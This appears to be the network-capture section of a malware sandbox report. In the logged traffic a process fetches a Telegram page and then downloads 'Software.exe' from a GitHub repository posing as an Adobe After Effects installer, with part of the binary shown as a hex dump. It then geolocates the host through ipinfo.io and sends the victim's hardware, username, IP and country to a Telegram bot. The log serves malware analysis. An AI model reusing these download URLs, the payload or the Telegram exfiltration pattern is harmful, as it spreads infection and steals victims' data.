May 16, 2022 10:29:51.985526085 CEST	2793	OUT	Data Raw: 69 2b 71 71 79 50 64 4e 79 58 37 64 6f 65 43 2b 58 42 33 44 33 6d 6e 53 72 4d 67 33 4e 6a 50 67 6d 4c 2b 7a 35 4c 46 37 51 35 77 54 4c 79 6e 67 4e 68 76 48 70 57 75 5a 6a 59 73 4b 4a 4a 43 44 39 67 6e 68 43 7a 31 4b 43 64 4c 46 49 52 68 4c 37 62 Data Ascii: i+qqyPdNyX7doeC+XB3D3mnSrMg3NjPgmL+z5LF7Q5wTLyngNhvHpWuZjYsKJJCD9gnhCz1KCdLFIRhL7btFYBMVLACbLl/tB3Ob1TVfKgwM2wAtMFQCqogmWldnA9QNASEAZXub4bdbqxu03+VnGbTxahI3rTu/qQ+YVPLP8wQdhktX3cnVmUmqlbuGGMqoSBb5yn0euzsnItthf0yKusf8z+dPHkmgjMSddPcF4MzoqaXllsd
May 16, 2022 10:29:51.985542059 CEST	2798	OUT	Data Raw: 4d 38 50 78 69 52 57 38 41 41 43 58 30 4f 65 67 67 64 61 44 67 6a 74 76 79 6d 45 64 77 6b 5a 4d 59 44 61 52 63 52 42 79 75 50 4b 67 56 2b 41 2f 6f 61 6f 59 2b 42 6e 4c 6d 38 41 4d 46 44 79 35 35 48 38 30 41 75 77 4c 45 49 32 69 5a 71 47 6d 6a 77 Data Ascii: M8PxiRW8AACX0OeggdaDgjtvymEdwkZMYDaRcRByuPKgV+A/oaoY+BnLm8AMFDy55H80AuwLEI2iZqGmjwN+Osv5qKJkKwMQC3/FfY4CNw+C9jALQbQZykVTJoX/BAleLhYb41ip4ef9HHeEtx83U5tVJlHvtKEIGGPn16RnVELQ3+vsCsJ/flrZPRFofRm1zsN4YCvFcpzizEeTT8/eGpJOt0wqO93pn5baGtv8u4LjxoV+5hh
May 16, 2022 10:29:52.337434053 CEST	2799	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 May 2022 08:29:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 36 31 0d 0a 68 74 74 70 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 41 64 6f 62 65 49 6e 73 74 61 6c 2f 41 64 6f 62 65 2d 41 66 74 65 72 2d 45 66 66 65 63 74 73 2d 43 43 2d 32 30 32 32 2d 31 2e 34 2f 72 65 6c 65 61 73 65 73 2f 64 6f 77 6e 6c 6f 61 64 2f 31 32 33 2f 53 6f 66 74 77 61 72 65 2e 65 78 65 3b 0d 0a 30 0d 0a 0d 0a Data Ascii: 61http://github.com/AdobeInstal/Adobe-After-Effects-CC-2022-1.4/releases/download/123/Software.exe;0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.5	49771	140.82.121.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
May 16, 2022 10:29:52.531881094 CEST	2800	OUT	GET /AdobeInstal/Adobe-After-Effects-CC-2022-1.4/releases/download/123/Software.exe HTTP/1.1 Host: github.com Cache-Control: no-cache
May 16, 2022 10:29:52.550935030 CEST	2800	IN	HTTP/1.1 301 Moved Permanently Content-Length: 0 Location: https://github.com/AdobeInstal/Adobe-After-Effects-CC-2022-1.4/releases/download/123/Software.exe

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.5	49784	34.117.59.81	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
May 16, 2022 10:30:10.866882086 CEST	9206	OUT	GET /json HTTP/1.1 Accept: text/* User-Agent: soft Host: ipinfo.io
May 16, 2022 10:30:10.992515087 CEST	9207	IN	HTTP/1.1 200 OK access-control-allow-origin: * x-content-type-options: nosniff content-type: application/json; charset=utf-8 content-length: 251 date: Mon, 16 May 2022 08:30:10 GMT x-envoy-upstream-service-time: 2 strict-transport-security: max-age=2592000; includeSubDomains vary: Accept-Encoding Via: 1.1 google Data Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 35 35 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 48 c3 bc 6e 65 6e 62 65 72 67 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 5a 75 67 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 43 48 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 37 2e 31 37 35 34 2c 38 2e 34 32 35 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 32 31 32 32 33 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 36 33 33 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 0a 20 20 22 72 65 61 64 6d 65 22 3a 20 22 68 74 74 70 73 3a 2f 2f 69 70 69 6e 66 6f 2e 69 6f 2f 6d 69 73 73 69 6e 67 61 75 74 68 22 0a 7d Data Ascii: { "ip": "102.129.143.55", "city": "Hnenberg", "region": "Zug", "country": "CH", "loc": "47.1754,8.4250", "org": "AS212238 Datacamp Limited", "postal": "6331", "timezone": "Europe/Zurich", "readme": "https://ipinfo.io/missingauth"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.5	49785	149.154.167.220	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
May 16, 2022 10:30:11.426740885 CEST	9208	OUT	GET /bot/start/sendMessage?chat_id=-1001457296348&text=%F0%9F%98%8E%20New%20worker%20connected!%0A%0A%E2%9D%97%EF%B8%8F%20Info:%20%0A%E2%80%94%20GPU:%20Microsoft%20Basic%20Display%20Adapter%0A%E2%80%94%20CPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0A%E2%80%94%20RAM:%208191%20MB%0A%0A%E2%9D%95%20Other%20info:%0A%E2%80%94%20Username:%20user%0A%E2%80%94%20IP:%20102.129.143.55%0A%E2%80%94%20Country:%20CH%0A%E2%80%94%20Build%20tag:%20Program%0A HTTP/1.1 Accept: text/* User-Agent: soft Host: api.telegram.org
May 16, 2022 10:30:11.452060938 CEST	9208	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 Date: Mon, 16 May 2022 08:30:11 GMT Content-Type: text/html Content-Length: 169 Connection: keep-alive Location: https://api.telegram.org/bot/start/sendMessage?chat_id=-1001457296348&text=%F0%9F%98%8E%20New%20worker%20connected!%0A%0A%E2%9D%97%EF%B8%8F%20Info:%20%0A%E2%80%94%20GPU:%20Microsoft%20Basic%20Display%20Adapter%0A%E2%80%94%20CPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0A%E2%80%94%20RAM:%208191%20MB%0A%0A%E2%9D%95%20Other%20info:%0A%E2%80%94%20Username:%20user%0A%E2%80%94%20IP:%20102.129.143.55%0A%E2%80%94%20Country:%20CH%0A%E2%80%94%20Build%20tag:%20Program%0A Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0</center></body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49753	149.154.167.99	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	Direction	Data
2022-05-16 08:29:37 UTC	OUT	GET /verstappenf1r HTTP/1.1 Host: t.me
2022-05-16 08:29:37 UTC	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 16 May 2022 08:29:37 GMT Content-Type: text/html; charset=utf-8 Content-Length: 9574 Connection: close Set-Cookie: stel_ssid=9ed9af210f9f6897ce_5826671527433024203; expires=Tue, 17 May 2022 08:29:37 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=35768000
2022-05-16 08:29:37 UTC	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 76 65 72 73 74 61 70 70 65 6e 66 31 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 76 65 72 73 74 61 70 70 65 6e 66 31 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @verstappenf1r</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta property="og:title" content="verstappenf1"><meta property

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49772	140.82.121.3	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
2022-05-16 08:29:52 UTC	9	OUT	GET /AdobeInstal/Adobe-After-Effects-CC-2022-1.4/releases/download/123/Software.exe HTTP/1.1 Cache-Control: no-cache Host: github.com Connection: Keep-Alive
2022-05-16 08:29:52 UTC	9	IN	HTTP/1.1 302 Found Server: GitHub.com Date: Mon, 16 May 2022 08:29:52 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Accept-Encoding, Accept, X-Requested-With permissions-policy: interest-cohort=() Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/479754935/9956e2fd-f4a0-464d-bde7-7689139d2f54?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20220516%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20220516T082952Z&X-Amz-Expires=300&X-Amz-Signature=4c7240ec515c7cb063a6716cd0ef70b36234d6f863c926f5119f7f1a2916e474&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=479754935&response-content-disposition=attachment%3B%20filename%3DSoftware.exe&response-content-type=application%2Foctet-stream Cache-Control: no-cache Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: no-referrer-when-downgrade Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
2022-05-16 08:29:52 UTC	11	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49773	185.199.108.133	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
2022-05-16 08:29:52 UTC	12	OUT	GET /github-production-release-asset-2e65be/479754935/9956e2fd-f4a0-464d-bde7-7689139d2f54?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20220516%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20220516T082952Z&X-Amz-Expires=300&X-Amz-Signature=4c7240ec515c7cb063a6716cd0ef70b36234d6f863c926f5119f7f1a2916e474&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=479754935&response-content-disposition=attachment%3B%20filename%3DSoftware.exe&response-content-type=application%2Foctet-stream HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Host: objects.githubusercontent.com
2022-05-16 08:29:53 UTC	13	IN	HTTP/1.1 200 OK Connection: close Content-Length: 6341088 Content-Type: application/octet-stream Content-MD5: Spq7Oxj377F8EN8ZrkWbFw== Last-Modified: Tue, 10 May 2022 18:31:40 GMT ETag: "0x8DA32B3537BDF1C" Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0 x-ms-request-id: 07a2b13b-401e-0068-15ff-6844f5000000 x-ms-version: 2020-04-08 x-ms-creation-time: Tue, 10 May 2022 18:31:40 GMT x-ms-lease-status: unlocked x-ms-lease-state: available x-ms-blob-type: BlockBlob Content-Disposition: attachment; filename=Software.exe x-ms-server-encrypted: true Fastly-Restarts: 1 Accept-Ranges: bytes Age: 0 Date: Mon, 16 May 2022 08:29:53 GMT Via: 1.1 varnish X-Served-By: cache-mxp6958-MXP X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1652689793.911172,VS0,VE297
2022-05-16 08:29:53 UTC	13	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 63 4c 30 f4 27 2d 5e a7 27 2d 5e a7 27 2d 5e a7 33 46 5d a6 29 2d 5e a7 33 46 5b a6 8f 2d 5e a7 33 46 5a a6 31 2d 5e a7 75 58 5a a6 36 2d 5e a7 75 58 5d a6 33 2d 5e a7 75 58 5b a6 6d 2d 5e a7 33 46 5f a6 22 2d 5e a7 27 2d 5f a7 7b 2d 5e a7 9d 58 57 a6 26 2d 5e a7 9d 58 5c a6 26 2d 5e a7 52 69 63 68 27 2d 5e a7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$cL0'-^'-^'-^3F])-^3F[-^3FZ1-^uXZ6-^uX]3-^uX[m-^3F_"-^'-_{-^XW&-^X\&-^Rich'-^PEL
2022-05-16 08:29:53 UTC	15	IN	Data Raw: ec 8b 45 14 50 8b 4d 10 51 8b 55 0c 52 8b 45 08 50 e8 d8 ff ff ff 8b 48 04 51 8b 10 52 e8 4d 07 01 00 83 c4 18 5d c3 cc cc cc cc cc cc cc 55 8b ec 83 ec 10 8d 45 0c 89 45 fc 8b 4d 08 89 4d f8 6a 01 e8 4c e9 00 00 83 c4 04 89 45 f4 8b 55 fc 52 6a 00 8b 45 f8 50 8b 4d f4 51 e8 9e ff ff ff 83 c4 10 89 45 f0 c7 45 fc 00 00 00 00 8b 45 f0 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 08 8b 45 18 50 8b 4d 14 51 8b 55 10 52 8b 45 0c 50 8b 4d 08 51 e8 51 ff ff ff 8b 50 04 52 8b 00 50 e8 49 07 01 00 83 c4 1c 89 45 fc 83 7d fc 00 7d 09 c7 45 f8 ff ff ff ff eb 06 8b 4d fc 89 4d f8 8b 45 f8 8b e5 5d c3 cc cc cc 55 8b ec 83 ec 08 8d 45 14 89 45 fc 8b 4d fc 51 6a 00 8b 55 10 52 8b 45 0c 50 8b 4d 08 51 e8 8d ff ff ff 83 c4 14 89 45 f8 c7 45 fc 00 00 00 00 8b Data Ascii: EPMQUREPHQRM]UEEMMjLEURjEPMQEEE]UEPMQUREPMQQPRPIE}}EMME]UEEMQjUREPMQEE
2022-05-16 08:29:53 UTC	16	IN	Data Raw: 00 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 08 89 4d f8 8b 45 f8 8b 4d 08 8b 50 04 3b 51 04 75 09 c7 45 fc 01 00 00 00 eb 07 c7 45 fc 00 00 00 00 8a 45 fc 8b e5 5d c2 04 00 55 8b ec 51 89 4d fc 8b 45 fc 8b 4d 08 89 08 8b 55 fc 8b 45 0c 89 42 04 8b 45 fc 8b e5 5d c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 89 4d fc 8b 45 fc 8b 00 8b e5 5d c3 55 8b ec 51 89 4d fc 8b 45 fc 8b 40 04 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 10 89 4d fc 8b 4d fc e8 cf ff ff ff 89 45 f8 8b 45 f8 8b 08 8b 51 08 89 55 f0 8b 4d fc e8 a9 ff ff ff 89 45 f4 8b 45 f4 50 8b 4d 08 51 8b 4d f8 ff 55 f0 8b 45 08 8b e5 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 0c 56 8b 4d 08 e8 81 ff ff ff 89 45 f4 8b Data Ascii: UMEMP;QuEEE]UQMEMUEBE]UQME]UQME@]UMMEEQUMEEPMQMUE]UVME
2022-05-16 08:29:53 UTC	18	IN	Data Raw: 50 e8 6e b3 00 00 8b e5 5d c3 55 8b ec 51 89 4d fc 8b 45 08 50 8b 4d fc e8 ed f6 ff ff 8b 4d fc c7 01 6c 72 9e 00 8b 45 fc 8b e5 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 89 4d fc 8b 45 fc c7 00 78 72 9e 00 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 89 4d fc 8b 4d fc e8 d1 ff ff ff 8b 45 08 83 e0 01 74 0e 6a 04 8b 4d fc 51 e8 3e 9d 00 00 83 c4 08 8b 45 fc 8b e5 5d c2 04 00 cc cc 55 8b ec 83 ec 08 89 4d fc 8b 45 fc 89 45 f8 6a 00 8b 4d f8 e8 47 7d 00 00 8b 4d fc 83 c1 04 e8 bc 11 00 00 8b 4d fc 83 c1 0c e8 b1 11 00 00 8b 4d fc 83 c1 14 e8 56 11 00 00 8b 4d fc 83 c1 1c e8 4b 11 00 00 8b 4d fc 83 c1 24 e8 90 11 00 00 8b 4d fc 83 c1 2c e8 85 11 00 00 83 7d 08 00 74 12 8b 4d 08 51 8b 55 fc 52 e8 4d 94 00 00 83 c4 08 eb 0a 68 f4 Data Ascii: Pn]UQMEPMMlrE]UQMExr]UQMMEtjMQ>E]UMEEjMG}MMMVMKM$M,}tMQURMh
2022-05-16 08:29:53 UTC	19	IN	Data Raw: 50 8b 4d fc ff 55 f8 8b e5 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 08 89 4d fc 8b 45 fc 8b 08 8b 51 1c 89 55 f8 8b 45 10 50 8b 4d 0c 51 8b 55 08 52 8b 4d fc ff 55 f8 8b e5 5d c2 0c 00 cc cc cc cc 55 8b ec 51 89 4d fc 8b 45 0c 50 8b 4d fc e8 0d ff ff ff 8b 4d fc c7 01 a8 72 9e 00 8b 55 08 52 8b 4d fc e8 d8 00 00 00 8b 45 fc 8b e5 5d c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 44 c7 45 fc 00 00 00 00 83 7d 08 00 74 69 8b 45 08 83 38 00 75 61 6a 18 e8 7e 97 00 00 83 c4 04 89 45 f8 83 7d f8 00 74 2b 83 4d fc 01 8b 4d 0c e8 96 fd ff ff 50 8d 4d bc e8 5d fa ff ff 89 45 f0 6a 00 8b 4d f0 51 8b 4d f8 e8 6c ff ff ff 89 45 f4 eb 07 c7 45 f4 00 00 00 00 8b 55 08 8b 45 f4 89 02 8b 4d fc 83 e1 01 74 0c 83 65 fc fe 8d 4d bc Data Ascii: PMU]UMEQUEPMQURMU]UQMEPMMrURME]UDE}tiE8uaj~E}t+MMPM]EjMQMlEEUEMteM
2022-05-16 08:29:53 UTC	20	IN	Data Raw: 8b 55 f8 8b e5 5d c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 89 4d fc 8b 45 fc 8b 48 30 51 8b 4d 08 e8 4a f8 ff ff 8b 45 08 8b e5 5d c2 04 00 cc 55 8b ec 51 89 4d fc 8b 4d fc e8 21 00 00 00 8b 45 08 83 e0 01 74 0e 6a 14 8b 4d fc 51 e8 9e 92 00 00 83 c4 08 8b 45 fc 8b e5 5d c2 04 00 cc cc 55 8b ec 51 89 4d fc 8b 4d fc e8 31 f3 ff ff 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 89 4d fc 8b 45 08 50 8b 4d fc e8 2d f3 ff ff 8b 4d fc c7 01 d8 72 9e 00 8b 45 fc 8b e5 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 8b 55 0c b1 20 e8 90 47 02 00 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 64 a1 30 00 00 00 5d c3 cc cc cc cc cc 55 8b ec e8 e8 ff ff ff 8b 40 0c 5d c3 cc cc cc 55 8b ec 8b 45 08 8b 4d 08 Data Ascii: U]UQMEH0QMJE]UQMM!EtjMQE]UQMM1]UQMEPM-MrE]UEU G]Ud0]U@]UEM
2022-05-16 08:29:53 UTC	22	IN	Data Raw: cc cc cc cc 53 8b dc 83 ec 08 83 e4 f8 83 c4 04 55 8b 6b 04 89 6c 24 04 8b ec 6a ff 68 30 75 42 00 64 a1 00 00 00 00 50 51 53 51 83 ec 5c 56 57 a1 14 70 a0 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 89 65 f0 89 4d e0 c7 45 dc 00 00 00 00 8b 45 e0 50 8d 4d a8 e8 1a 10 00 00 8d 4d a8 e8 a2 0f 00 00 0f b6 c8 85 c9 0f 84 fe 00 00 00 8b 55 e0 8b 02 8b 4d e0 03 48 04 89 4d d8 8d 55 a0 52 8b 4d d8 e8 2d fa ff ff 50 e8 87 59 00 00 83 c4 04 89 45 d0 8d 4d a0 e8 a9 f2 ff ff c7 45 fc 00 00 00 00 8b 45 e0 8b 08 8b 55 e0 03 51 04 8b ca e8 50 10 00 00 88 45 e7 8b 45 e0 8b 08 8b 55 e0 03 51 04 89 55 d4 8b 45 e0 8b 08 8b 55 e0 03 51 04 8b ca e8 4d 10 00 00 50 8d 4d 98 e8 84 06 00 00 8b 08 8b 50 04 89 4d b8 89 55 bc 8b 45 b8 8b 4d bc 89 45 b0 89 4d b4 8b 53 0c 52 8b 43 08 50 Data Ascii: SUkl$jh0uBdPQSQ\VWp3PEdeMEEPMMUMHMURM-PYEMEEUQPEEUQUEUQMPMPMUEMEMSRCP
2022-05-16 08:29:53 UTC	23	IN	Data Raw: f4 0f b6 4d fe 51 8b 4d f4 e8 a4 55 00 00 c7 45 f0 db 29 9f 00 8b 55 f8 52 8b 45 f0 50 8d 4d ff e8 7d e4 ff ff 8b 4d f8 e8 e5 0f 00 00 0f b6 4d 0c 51 8b 55 08 52 8b 4d f8 e8 24 10 00 00 8d 4d ff e8 3c e4 ff ff 8b 45 f8 8b e5 5d c2 08 00 cc cc cc 55 8b ec 83 ec 10 89 4d f8 8b 45 f8 89 45 f4 0f b6 4d fe 51 8b 4d f4 e8 44 55 00 00 c7 45 f0 db 29 9f 00 8b 55 f8 52 8b 45 f0 50 8d 4d ff e8 1d e4 ff ff 8b 4d f8 e8 85 0f 00 00 8b 4d 08 51 8b 4d f8 e8 89 10 00 00 8d 4d ff e8 e1 e3 ff ff 8b 45 f8 8b e5 5d c2 04 00 cc cc cc cc cc cc cc cc 55 8b ec 83 ec 10 89 4d f8 8b 45 f8 89 45 f4 0f b6 4d fe 51 8b 4d f4 e8 e4 54 00 00 c7 45 f0 db 29 9f 00 8b 55 f8 52 8b 45 f0 50 8d 4d ff e8 bd e3 ff ff 8b 4d f8 e8 25 0f 00 00 8b 4d 0c 51 8b 55 08 52 8b 4d f8 e8 55 10 00 00 8d 4d Data Ascii: MQMUE)UREPM}MMQURM$M<E]UMEEMQMDUE)UREPMMMQMME]UMEEMQMTE)UREPMM%MQURMUM
2022-05-16 08:29:53 UTC	24	IN	Data Raw: 04 69 c0 97 75 00 00 99 b9 a0 86 01 00 f7 f9 03 45 d0 89 45 d0 6a 00 8b 55 d0 83 c2 32 52 8d 4d dc e8 5a 1f 00 00 8b 4d 14 e8 22 ef ff ff 50 6a 00 8d 45 f4 50 8b 4d cc 51 e8 e2 1a 00 00 83 c4 10 89 45 b0 8d 4d dc e8 c4 f8 ff ff 89 45 ac 6a 00 8d 4d dc e8 f7 f8 ff ff 89 45 a8 83 ec 08 f2 0f 10 45 1c f2 0f 11 04 24 8b 55 bc 52 8b 45 b0 50 8b 4d ac 51 8b 55 a8 52 e8 a2 da ff ff 83 c4 18 89 45 a4 8b 45 a4 50 8d 4d dc e8 a0 f8 ff ff 50 0f b6 4d 18 51 8b 55 14 52 8b 45 10 50 8b 4d 0c 51 8b 55 08 52 8b 45 cc 50 e8 11 16 00 00 83 c4 20 8d 4d dc e8 46 f9 ff ff 8b 45 08 8b 4d fc 33 cd e8 c6 81 00 00 8b e5 5d c2 1c 00 cc cc cc 55 8b ec 83 ec 50 a1 14 70 a0 00 33 c5 89 45 fc 89 4d b0 8b 45 20 50 8b 4d 1c 51 8b 4d 14 e8 5d ee ff ff 50 68 a8 39 a0 00 8d 55 f4 52 8b 45 Data Ascii: iuEEjU2RMZM"PjEPMQEMEjMEE$UREPMQUREEPMPMQUREPMQUREP MFEM3]UPp3EME PMQM]Ph9URE
2022-05-16 08:29:53 UTC	26	IN	Data Raw: ec 83 ec 08 89 4d f8 e8 02 76 00 00 0f b6 c0 85 c0 75 06 c6 45 ff 01 eb 04 c6 45 ff 00 8a 4d ff 88 4d fe 0f b6 55 fe 85 d2 74 0a 8b 45 f8 8b 08 e8 b9 17 00 00 8b 4d f8 e8 a1 16 00 00 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 08 89 4d fc 8b 45 08 50 8b 4d fc e8 bb 16 00 00 8b 4d 08 8b 11 8b 4d 08 03 4a 04 e8 4b e9 ff ff 0f b6 c0 85 c0 75 09 8b 4d fc c6 41 04 00 eb 4a 8b 55 08 8b 02 8b 4d 08 03 48 04 e8 2b 18 00 00 89 45 f8 83 7d f8 00 74 08 8b 4d f8 3b 4d 08 75 09 8b 55 fc c6 42 04 01 eb 20 8b 4d f8 e8 b9 16 00 00 8b 45 08 8b 08 8b 55 08 03 51 04 8b ca e8 f7 e8 ff ff 8b 4d fc 88 41 04 8b 45 fc 8b e5 5d c2 04 00 cc cc cc cc cc cc cc cc 55 8b ec 51 89 4d fc 8b 45 fc 8a 40 40 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 Data Ascii: MvuEEMMUtEM]UMEPMMMJKuMAJUMH+E}tM;MuUB MEUQMAE]UQME@@]U
